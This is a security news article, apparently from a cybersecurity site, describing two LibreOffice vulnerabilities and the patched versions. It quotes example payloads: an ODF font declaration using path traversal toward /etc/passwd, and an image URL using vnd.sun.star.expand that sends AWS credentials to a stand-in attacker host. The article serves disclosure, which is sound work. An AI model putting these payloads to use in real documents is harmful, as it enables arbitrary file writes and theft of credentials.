Saturday, May 3, 2025
HomeCVE/vulnerabilityLibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

Published on

SIEM as a Service

Follow Us on Google News

Two critical vulnerabilities in LibreOffice (CVE-2024-12425 and CVE-2024-12426) expose millions of users to file system manipulation and sensitive data extraction attacks.

These flaws affect both desktop users opening malicious documents and server-side systems using LibreOffice for headless document processing.

CVE-2024-12425: Path Traversal Enables Arbitrary File Writes

The first vulnerability stems from improper path sanitization when handling embedded fonts in OpenDocument XML files.

- Advertisement - Google News

Attackers can craft documents containing malicious font declarations that escape LibreOffice’s temporary directory through path traversal sequences, as CodeanLabs reports.

The critical code flaw resides in EmbeddedFontsHelper::fileUrlForTemporaryFont, where user-controlled fontName values aren’t sanitized before constructing file paths:

OUString EmbeddedFontsHelper::fileUrlForTemporaryFont(const OUString& fontName) {

// ...
    path += "/user/temp/embeddedfonts/fromdocs/";
    return path + filename; // FontName contains unsanitized input
}

An attacker could exploit this by embedding a font declaration containing directory traversal sequences:

<style:font-face svg:font-family="../../../../../../../etc/passwd">
  <office:binaryData>SGVsbG8gd29ybGQ...</office:binaryData>
</style:font-face>

This writes the decoded binary data to /etc/passwd0.ttf despite the .ttf extension limitation. 

Server-side installations are particularly vulnerable as attackers could overwrite web application files or configuration scripts.

CVE-2024-12426: Variable Expansion Enables Data Exfiltration

The second vulnerability involves LibreOffice’s handling of the vnd.sun.star.expand URI scheme, which supports environment variable substitution and INI file parsing. Attackers can craft documents that leak sensitive information through manipulated URLs:

<img src="vnd.sun.star.expand:http://attacker.com?leak=$HOME/.aws/credentials">

The expansion mechanism supports recursive lookups, enabling complex data extraction chains:

<img src="vnd.sun.star.expand:${file://$HOME/.thunderbird/profiles.ini:Profile0:Path}/...">

This allows reading Thunderbird profiles, SQLite databases, and application secrets stored in environment variables. In one demonstrated attack, hackers could intercept WordPress password reset tokens from email clients by combining multiple expansion steps.

LibreOffice released patches addressing these vulnerabilities in versions:

  • 7.5.9 (Community)
  • 7.6.5 (Community)
  • 24.2.2 (Enterprise)

These vulnerabilities highlight the risks of complex document processing ecosystems, particularly when combining user-controlled content with legacy file format support.

Enterprises must maintain rigorous patch management cycles for office software components, even in server environments.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Hundreds of Fortune 500 Companies Have Unknowingly Employed North Korean IT Operatives

North Korean nationals have successfully infiltrated the employee ranks of major global corporations at...

Stealthy New NodeJS Backdoor Infects Users Through CAPTCHA Verifications

Security researchers have uncovered a sophisticated malware campaign utilizing fake CAPTCHA verification screens to...

State-Sponsored Hacktivism on the Rise, Transforming the Cyber Threat Landscape

Global cybersecurity landscape is undergoing a significant transformation, as state-sponsored hacktivism gains traction amid...

NVIDIA Riva AI Speech Flaw Let Hackers Gain Unauthorized Access to Abuse GPU Resources & API keys

Researchers have uncovered significant security vulnerabilities in NVIDIA Riva, a breakthrough AI speech technology...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Hundreds of Fortune 500 Companies Have Unknowingly Employed North Korean IT Operatives

North Korean nationals have successfully infiltrated the employee ranks of major global corporations at...

State-Sponsored Hacktivism on the Rise, Transforming the Cyber Threat Landscape

Global cybersecurity landscape is undergoing a significant transformation, as state-sponsored hacktivism gains traction amid...

Stealthy New NodeJS Backdoor Infects Users Through CAPTCHA Verifications

Security researchers have uncovered a sophisticated malware campaign utilizing fake CAPTCHA verification screens to...